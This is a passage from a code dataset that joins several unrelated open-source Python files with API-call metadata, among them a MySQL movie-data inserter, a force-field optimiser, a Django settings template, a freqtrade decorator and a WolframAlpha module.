'(minimum_ip_range, 255)', False, 'import random\n'), ((99, 14, 99, 37), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((99, 40, 99, 69), 'datetime.datetime', 'datetime.datetime', ({(99, 58, 99, 62): '1970', (99, 64, 99, 65): '1', (99, 67, 99, 68): '1'}, {}), '(1970, 1, 1)', False, 'import datetime\n')] |
aloneZERO/douban-movie-visualization | spider/db.py | 8e59c4d0b00df1b240a5dce09093ae4984fd7118 | #!python3
'''
数据库操作类
author: justZero
email: [email protected]
date: 2017-8-6
'''
import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint
class MySQLdb(object):
def __init__(self):
self.conn = pymysql.connect(
host='localhost',
user='root',
passwd='root',
db='douban_movie',
port=8889,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor)
self.conn.autocommit(True)
self.cursor = self.conn.cursor()
def close(self):
self.conn.close()
self.cursor.close()
# 批量插入
def __insert_many(self, sql, params):
self.cursor.executemany(sql, params)
# 电影数据插入
def insert_movie(self, params):
sql = 'insert into movie(movieId,title,url,cover,rate,director,composer,actor,category,district,language,showtime,length,othername,description) '+ \
'values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
self.__insert_many(sql, params)
# 统计数据插入
def insert_rate(self, params):
sql = 'insert into rate(name,category,rate) values(%s,%s,%s)'
self.__insert_many(sql, params)
if __name__ == '__main__':
inputFile = 'data/douban_movie_clean.txt'
movies_df = pd.read_csv(inputFile, sep='^')
movies = np.array(movies_df).tolist()
db = MySQLdb()
try:
db.insert_movie(movies)
except Exception as e:
raise e
finally:
db.close()
| [((55, 16, 55, 47), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((22, 20, 29, 67), 'pymysql.connect', 'pymysql.connect', (), '', False, 'import pymysql\n'), ((56, 13, 56, 32), 'numpy.array', 'np.array', ({(56, 22, 56, 31): 'movies_df'}, {}), '(movies_df)', True, 'import numpy as np\n')] |
sctiwari/EZFF_ASE | examples/rxff-serial/run.py | 94710d4cf778ff2db5e6df0cd6d10d92e1b98afe | import ezff
from ezff.interfaces import gulp, qchem
# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')
def my_error_function(rr):
# Get a unique path for GULP jobs from the MPI rank. Set to '0' for serial jobs
try:
path = str(pool.rank)
except:
path = '0'
# Calculate Ground State
md_gs_job = gulp.job(path = path)
md_gs_job.structure = gt_gs
md_gs_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_gs_job.options['pbc'] = False
md_gs_job.options['relax_atoms'] = False
md_gs_job.options['relax_cell'] = False
# Run GULP calculation
md_gs_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_gs_energy = md_gs_job.read_energy()
md_gs_job.cleanup()
# Calculate PES Scan
md_scan_job = gulp.job(path = path)
md_scan_job.structure = gt_scan
md_scan_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_scan_job.options['pbc'] = False
md_scan_job.options['relax_atoms'] = False
md_scan_job.options['relax_cell'] = False
# Run GULP calculation
md_scan_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_scan_energy = md_scan_job.read_energy()
md_scan_job.cleanup()
# Calculate error
total_error = ezff.error_energy( md_scan_energy-md_gs_energy, gt_scan_energy-gt_gs_energy, weights = 'uniform')
return [total_error]
# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')
problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
| [((5, 8, 5, 58), 'ezff.interfaces.qchem.read_structure', 'qchem.read_structure', ({(5, 29, 5, 57): '"""ground_truths/optCHOSx.out"""'}, {}), "('ground_truths/optCHOSx.out')", False, 'from ezff.interfaces import gulp, qchem\n'), ((6, 15, 6, 62), 'ezff.interfaces.qchem.read_energy', 'qchem.read_energy', ({(6, 33, 6, 61): '"""ground_truths/optCHOSx.out"""'}, {}), "('ground_truths/optCHOSx.out')", False, 'from ezff.interfaces import gulp, qchem\n'), ((7, 10, 7, 61), 'ezff.interfaces.qchem.read_structure', 'qchem.read_structure', ({(7, 31, 7, 60): '"""ground_truths/scanCHOSx.out"""'}, {}), "('ground_truths/scanCHOSx.out')", False, 'from ezff.interfaces import gulp, qchem\n'), ((8, 17, 8, 65), 'ezff.interfaces.qchem.read_energy', 'qchem.read_energy', ({(8, 35, 8, 64): '"""ground_truths/scanCHOSx.out"""'}, {}), "('ground_truths/scanCHOSx.out')", False, 'from ezff.interfaces import gulp, qchem\n'), ((49, 9, 49, 68), 'ezff.read_variable_bounds', 'ezff.read_variable_bounds', (), '', False, 'import ezff\n'), ((50, 11, 50, 52), 'ezff.read_forcefield_template', 'ezff.read_forcefield_template', ({(50, 41, 50, 51): '"""template"""'}, {}), "('template')", False, 'import ezff\n'), ((52, 10, 52, 124), 'ezff.OptProblem', 'ezff.OptProblem', (), '', False, 'import ezff\n'), ((53, 12, 53, 62), 'ezff.Algorithm', 'ezff.Algorithm', (), '', False, 'import ezff\n'), ((54, 0, 54, 49), 'ezff.optimize', 'ezff.optimize', (), '', False, 'import ezff\n'), ((18, 16, 18, 37), 'ezff.interfaces.gulp.job', 'gulp.job', (), '', False, 'from ezff.interfaces import gulp, qchem\n'), ((20, 27, 20, 84), 'ezff.generate_forcefield', 'ezff.generate_forcefield', (), '', False, 'import ezff\n'), ((32, 18, 32, 39), 'ezff.interfaces.gulp.job', 'gulp.job', (), '', False, 'from ezff.interfaces import gulp, qchem\n'), ((34, 29, 34, 86), 'ezff.generate_forcefield', 'ezff.generate_forcefield', (), '', False, 'import ezff\n'), ((45, 18, 45, 115), 'ezff.error_energy', 'ezff.error_energy', (), '', False, 'import ezff\n')] |
dylanwal/unit_parse | dev_files/utils.py | 07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d | import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| [((7, 0, 7, 35), 'testing_func.test_logger.setLevel', 'test_logger.setLevel', ({(7, 21, 7, 34): 'logging.DEBUG'}, {}), '(logging.DEBUG)', False, 'from testing_func import testing_func, test_logger\n'), ((8, 0, 8, 30), 'unit_parse.logger.setLevel', 'logger.setLevel', ({(8, 16, 8, 29): 'logging.DEBUG'}, {}), '(logging.DEBUG)', False, 'from unit_parse import logger, Unit, Q\n'), ((23, 0, 23, 41), 'testing_func.testing_func', 'testing_func', ({(23, 13, 23, 23): 'split_list', (23, 25, 23, 40): 'test_split_list'}, {}), '(split_list, test_split_list)', False, 'from testing_func import testing_func, test_logger\n'), ((38, 0, 38, 38), 'testing_func.testing_func', 'testing_func', ({(38, 13, 38, 21): 'sig_figs', (38, 23, 38, 37): 'test_round_off'}, {}), '(sig_figs, test_round_off)', False, 'from testing_func import testing_func, test_logger\n'), ((56, 0, 56, 45), 'testing_func.testing_func', 'testing_func', ({(56, 13, 56, 27): 'get_list_depth', (56, 29, 56, 44): 'test_list_depth'}, {}), '(get_list_depth, test_list_depth)', False, 'from testing_func import testing_func, test_logger\n'), ((73, 0, 73, 57), 'testing_func.testing_func', 'testing_func', ({(73, 13, 73, 31): 'remove_empty_cells', (73, 33, 73, 56): 'test_remove_empty_cells'}, {}), '(remove_empty_cells, test_remove_empty_cells)', False, 'from testing_func import testing_func, test_logger\n'), ((81, 0, 81, 63), 'testing_func.testing_func', 'testing_func', ({(81, 13, 81, 32): 'quantity_difference', (81, 34, 81, 62): 'examples_quantity_difference'}, {}), '(quantity_difference, examples_quantity_difference)', False, 'from testing_func import testing_func, test_logger\n'), ((77, 5, 77, 13), 'unit_parse.Q', 'Q', ({(77, 7, 77, 12): '"""5 g"""'}, {}), "('5 g')", False, 'from unit_parse import logger, Unit, Q\n'), ((77, 15, 77, 23), 'unit_parse.Q', 'Q', ({(77, 17, 77, 22): '"""0.5"""'}, {}), "('0.5')", False, 'from unit_parse import logger, Unit, Q\n'), ((14, 14, 14, 23), 'unit_parse.Unit', 'Unit', ({(14, 19, 14, 22): '"""g"""'}, {}), "('g')", False, 'from unit_parse import logger, Unit, Q\n'), ((14, 50, 14, 59), 'unit_parse.Unit', 'Unit', ({(14, 55, 14, 58): '"""g"""'}, {}), "('g')", False, 'from unit_parse import logger, Unit, Q\n'), ((21, 6, 21, 15), 'unit_parse.Unit', 'Unit', ({(21, 11, 21, 14): '"""g"""'}, {}), "('g')", False, 'from unit_parse import logger, Unit, Q\n'), ((21, 19, 21, 28), 'unit_parse.Unit', 'Unit', ({(21, 24, 21, 27): '"""g"""'}, {}), "('g')", False, 'from unit_parse import logger, Unit, Q\n'), ((77, 39, 77, 48), 'unit_parse.Q', 'Q', ({(77, 41, 77, 47): '"""10 g"""'}, {}), "('10 g')", False, 'from unit_parse import logger, Unit, Q\n'), ((79, 25, 79, 34), 'unit_parse.Q', 'Q', ({(79, 27, 79, 33): '"""10 g"""'}, {}), "('10 g')", False, 'from unit_parse import logger, Unit, Q\n')] |
d53dave/python-crypto-licensecheck | genlicense.py | d11612612ea54a5418fd8dbba9212a9c84c56f22 | import sys
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
def sign_data(key, data, output_file):
with open(key, 'r', encoding='utf-8') as keyFile:
rsakey = RSA.importKey(keyFile.read())
signer = pkcs1_15.new(rsakey)
digest = SHA256.new(data.encode('utf-8'))
with open(output_file, 'wb') as out:
out.write(signer.sign(digest))
if __name__ == '__main__':
key_file = sys.argv[1]
input_string = sys.argv[2]
out_file = sys.argv[3]
sign_data(key_file, input_string, out_file)
| [((10, 17, 10, 37), 'Crypto.Signature.pkcs1_15.new', 'pkcs1_15.new', ({(10, 30, 10, 36): 'rsakey'}, {}), '(rsakey)', False, 'from Crypto.Signature import pkcs1_15\n')] |
Fractate/freqbot | freqtrade/strategy/informative_decorator.py | 47b35d2320dc97977411454c1466c762d339fdee | from typing import Any, Callable, NamedTuple, Optional, Union
from pandas import DataFrame
from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair
PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]
class InformativeData(NamedTuple):
asset: Optional[str]
timeframe: str
fmt: Union[str, Callable[[Any], str], None]
ffill: bool
def informative(timeframe: str, asset: str = '',
fmt: Optional[Union[str, Callable[[Any], str]]] = None,
ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
"""
A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
define informative indicators.
Example usage:
@informative('1h')
def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
return dataframe
:param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe.
:param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
current pair.
:param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
specified, defaults to:
* {base}_{quote}_{column}_{timeframe} if asset is specified.
* {column}_{timeframe} if asset is not specified.
Format string supports these format variables:
* {asset} - full name of the asset, for example 'BTC/USDT'.
* {base} - base currency in lower case, for example 'eth'.
* {BASE} - same as {base}, except in upper case.
* {quote} - quote currency in lower case, for example 'usdt'.
* {QUOTE} - same as {quote}, except in upper case.
* {column} - name of dataframe column.
* {timeframe} - timeframe of informative dataframe.
:param ffill: ffill dataframe after merging informative pair.
"""
_asset = asset
_timeframe = timeframe
_fmt = fmt
_ffill = ffill
def decorator(fn: PopulateIndicators):
informative_pairs = getattr(fn, '_ft_informative', [])
informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
setattr(fn, '_ft_informative', informative_pairs)
return fn
return decorator
def _format_pair_name(config, pair: str) -> str:
return pair.format(stake_currency=config['stake_currency'],
stake=config['stake_currency']).upper()
def _create_and_merge_informative_pair(strategy, dataframe: DataFrame, metadata: dict,
inf_data: InformativeData,
populate_indicators: PopulateIndicators):
asset = inf_data.asset or ''
timeframe = inf_data.timeframe
fmt = inf_data.fmt
config = strategy.config
if asset:
# Insert stake currency if needed.
asset = _format_pair_name(config, asset)
else:
# Not specifying an asset will define informative dataframe for current pair.
asset = metadata['pair']
if '/' in asset:
base, quote = asset.split('/')
else:
# When futures are supported this may need reevaluation.
# base, quote = asset, ''
raise OperationalException('Not implemented.')
# Default format. This optimizes for the common case: informative pairs using same stake
# currency. When quote currency matches stake currency, column name will omit base currency.
# This allows easily reconfiguring strategy to use different base currency. In a rare case
# where it is desired to keep quote currency in column name at all times user should specify
# fmt='{base}_{quote}_{column}_{timeframe}' format or similar.
if not fmt:
fmt = '{column}_{timeframe}' # Informatives of current pair
if inf_data.asset:
fmt = '{base}_{quote}_' + fmt # Informatives of other pairs
inf_metadata = {'pair': asset, 'timeframe': timeframe}
inf_dataframe = strategy.dp.get_pair_dataframe(asset, timeframe)
inf_dataframe = populate_indicators(strategy, inf_dataframe, inf_metadata)
formatter: Any = None
if callable(fmt):
formatter = fmt # A custom user-specified formatter function.
else:
formatter = fmt.format # A default string formatter.
fmt_args = {
'BASE': base.upper(),
'QUOTE': quote.upper(),
'base': base.lower(),
'quote': quote.lower(),
'asset': asset,
'timeframe': timeframe,
}
inf_dataframe.rename(columns=lambda column: formatter(column=column, **fmt_args),
inplace=True)
date_column = formatter(column='date', **fmt_args)
if date_column in dataframe.columns:
raise OperationalException(f'Duplicate column name {date_column} exists in '
f'dataframe! Ensure column names are unique!')
dataframe = merge_informative_pair(dataframe, inf_dataframe, strategy.timeframe, timeframe,
ffill=inf_data.ffill, append_timeframe=False,
date_column=date_column)
return dataframe
| [((125, 16, 127, 63), 'freqtrade.strategy.strategy_helper.merge_informative_pair', 'merge_informative_pair', (), '', False, 'from freqtrade.strategy.strategy_helper import merge_informative_pair\n'), ((88, 14, 88, 54), 'freqtrade.exceptions.OperationalException', 'OperationalException', ({(88, 35, 88, 53): '"""Not implemented."""'}, {}), "('Not implemented.')", False, 'from freqtrade.exceptions import OperationalException\n'), ((123, 14, 124, 81), 'freqtrade.exceptions.OperationalException', 'OperationalException', ({(123, 35, 124, 80): 'f"""Duplicate column name {date_column} exists in dataframe! Ensure column names are unique!"""'}, {}), "(\n f'Duplicate column name {date_column} exists in dataframe! Ensure column names are unique!'\n )", False, 'from freqtrade.exceptions import OperationalException\n')] |
VeirichR/curso-python-selenium | codigo_das_aulas/aula_09/aula_09_03.py | 9b9107a64adb4e6bcf10c76287e0b4cc7d024321 | from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
def esperar_elemento(elemento, webdriver):
print(f'Tentando encontrar "{elemento}"')
if webdriver.find_elements_by_css_selector(elemento):
return True
return False
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Deu ruim')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
'A mensagem de sucesso não apareceu'
)
sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concluído'
| [((15, 16, 15, 51), 'functools.partial', 'partial', ({(15, 24, 15, 40): 'esperar_elemento', (15, 42, 15, 50): '"""button"""'}, {}), "(esperar_elemento, 'button')", False, 'from functools import partial\n'), ((16, 18, 16, 56), 'functools.partial', 'partial', ({(16, 26, 16, 42): 'esperar_elemento', (16, 44, 16, 55): '"""#finished"""'}, {}), "(esperar_elemento, '#finished')", False, 'from functools import partial\n'), ((20, 9, 20, 18), 'selenium.webdriver.Firefox', 'Firefox', ({}, {}), '()', False, 'from selenium.webdriver import Firefox\n'), ((22, 6, 22, 31), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', ({(22, 20, 22, 26): 'driver', (22, 28, 22, 30): '10'}, {}), '(driver, 10)', False, 'from selenium.webdriver.support.ui import WebDriverWait\n')] |
irom-lab/RL_Generalization | prae/losses.py | 82add6898ee2e962a3aa5efedf80821a013eae7f | import torch
from torch import nn
from prae.distances import square_dist, HingedSquaredEuclidean
class Loss(nn.Module):
"""
"""
def __init__(self, hinge, neg=True, rew=True):
"""
"""
super().__init__()
self.reward_loss = square_dist
# If False, no negative sampling
self.neg = neg
# If False, no reward loss
self.rew = rew
self.distance = HingedSquaredEuclidean(eps=hinge)
def forward(self, z_c, z_l, z_n, z_f, r, r_e):
"""
"""
# Transition loss
transition_loss = self.distance.distance(z_n, z_l).mean()
# Reward loss
if self.rew:
reward_loss = 0.5 * self.reward_loss(r, r_e).mean()
else:
reward_loss = torch.zeros_like(transition_loss)
# Negative los
if self.neg:
z_n = tile(z_n, z_f)
batch_size = z_c.shape[0]
negative_loss = self.distance.negative_distance(z_n, z_f).sum()/batch_size
else:
negative_loss = torch.zeros_like(transition_loss)
return transition_loss, reward_loss, negative_loss
def tile(embedding, example):
"""
"""
n = example.shape[0]//embedding.shape[0]
embedding = embedding.unsqueeze(1).repeat(1, n, 1)
embedding = squeeze_embedding(embedding)
return embedding
def squeeze_embedding(x):
"""
"""
b, n, d = x.shape
x = x.reshape(b*n, d)
return x
| [((18, 24, 18, 57), 'prae.distances.HingedSquaredEuclidean', 'HingedSquaredEuclidean', (), '', False, 'from prae.distances import square_dist, HingedSquaredEuclidean\n'), ((30, 26, 30, 59), 'torch.zeros_like', 'torch.zeros_like', ({(30, 43, 30, 58): 'transition_loss'}, {}), '(transition_loss)', False, 'import torch\n'), ((40, 28, 40, 61), 'torch.zeros_like', 'torch.zeros_like', ({(40, 45, 40, 60): 'transition_loss'}, {}), '(transition_loss)', False, 'import torch\n')] |
isathish/ai_opesource | orion/modules/active/wolfram.py | cdccd882306c45712fcdd40e15937b5a9571028a | """
Handles most general questions (including math!)
Requires:
- WolframAlpha API key
Usage Examples:
- "How tall is Mount Everest?"
- "What is the derivative of y = 2x?"
"""
import wolframalpha
from orion.classes.module import Module
from orion.classes.task import ActiveTask
from orion import settings
wolfram_client = wolframalpha.Client(settings.WOLFRAM_KEY)
class AnswerTask(ActiveTask):
def match(self, text):
return True
def action(self, text):
try:
query = wolfram_client.query(text)
self.speak(next(query.results).text)
except:
self.speak(settings.NO_MODULES)
class Wolfram(Module):
def __init__(self):
tasks = [AnswerTask()]
super(Wolfram, self).__init__('wolfram', tasks, priority=0)
| [((18, 17, 18, 58), 'wolframalpha.Client', 'wolframalpha.Client', ({(18, 37, 18, 57): 'settings.WOLFRAM_KEY'}, {}), '(settings.WOLFRAM_KEY)', False, 'import wolframalpha\n')] |
linuxdaemon/poly-match | polymatch/matchers/standard.py | 66d967999de982d5ee9463c46b0ff8040d91dc67 | from polymatch import PolymorphicMatcher
class ExactMatcher(PolymorphicMatcher):
def compile_pattern(self, raw_pattern):
return raw_pattern
def compile_pattern_cs(self, raw_pattern):
return raw_pattern
def compile_pattern_ci(self, raw_pattern):
return raw_pattern.lower()
def compile_pattern_cf(self, raw_pattern):
return raw_pattern.casefold()
def match_text(self, pattern, text):
return text == pattern
@classmethod
def get_type(cls):
return "exact"
class ContainsMatcher(PolymorphicMatcher):
def compile_pattern(self, raw_pattern):
return raw_pattern
def compile_pattern_cs(self, raw_pattern):
return raw_pattern
def compile_pattern_ci(self, raw_pattern):
return raw_pattern.lower()
def compile_pattern_cf(self, raw_pattern):
return raw_pattern.casefold()
def match_text(self, pattern, text):
return pattern in text
@classmethod
def get_type(cls):
return "contains"
| [] |
carthage-college/django-djcorsche | djcorsche/settings_default.py | c43db6e634f5b3fc9c8b0cff80ced8382ca6643c | """
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
INFORMIX_DEBUG = "debug"
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
API_URL = "%s/%s" % (SERVER_URL, "api")
LIVEWHALE_API_URL = "https://%s" % (SERVER_URL)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.core.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'django_djskeletor',
'ENGINE': 'django.db.backends.mysql',
#'ENGINE': 'django.db.backends.dummy',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.formtools',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# the following should be uncommented unless you are
# embedding your apps in iframes
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
"/data2/django_projects/djskeletor/templates/",
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"djtools.context_processors.sitevars",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.media",
)
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_djskeletor_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DJSKELETOR_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_SERVER_PWM = ''
LDAP_PORT = ''
LDAP_PORT_PWM = ''
LDAP_PROTOCOL = ""
LDAP_PROTOCOL_PWM = ""
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
LDAP_OBJECT_CLASS = ""
LDAP_OBJECT_CLASS_LIST = []
LDAP_GROUPS = {}
LDAP_RETURN = []
LDAP_RETURN_PWM = []
LDAP_ID_ATTR = ""
LDAP_CHALLENGE_ATTR = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN=".carthage.edu"
SESSION_COOKIE_NAME ='django_djskeletor_cookie'
SESSION_COOKIE_AGE = 86400
# SMTP settings
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_FAIL_SILENTLY = False
DEFAULT_FROM_EMAIL = ''
SERVER_EMAIL = ''
SERVER_MAIL=''
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'include_html': True,
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'djskeletor': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| [((33, 11, 33, 36), 'os.path.dirname', 'os.path.dirname', ({(33, 27, 33, 35): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((32, 27, 32, 52), 'os.path.dirname', 'os.path.dirname', ({(32, 43, 32, 51): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((166, 28, 166, 53), 'os.path.dirname', 'os.path.dirname', ({(166, 44, 166, 52): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
AaronYang2333/CSCI_570 | records/12-09/ffff.py | 03e34ce5ff192fc94612bc3afb51dcab3e854462 | __author__ = 'Aaron Yang'
__email__ = '[email protected]'
__date__ = '12/9/2020 4:18 PM'
from abc import abstractmethod
class Product(object):
@abstractmethod
def setMsg(self, msg="default info"):
self.msg = msg
@abstractmethod
def info(self):
print(self.msg)
class DefaultObj(Product):
def __init__(self):
super().setMsg()
class Factory(object):
@abstractmethod
def produce(self):
return DefaultObj()
class PC(Product):
def __init__(self):
self.setMsg('pc info')
class LAPTOP(Product):
def __init__(self):
self.setMsg('laptop info')
class PCFactory(Factory):
def produce(self):
return PC()
class LAPTOPFactory(Factory):
def produce(self):
return LAPTOP()
if __name__ == '__main__':
ss = Factory().produce()
pc = PCFactory().produce()
laptop = LAPTOPFactory().produce()
pc.info()
laptop.info()
ss.info()
| [] |
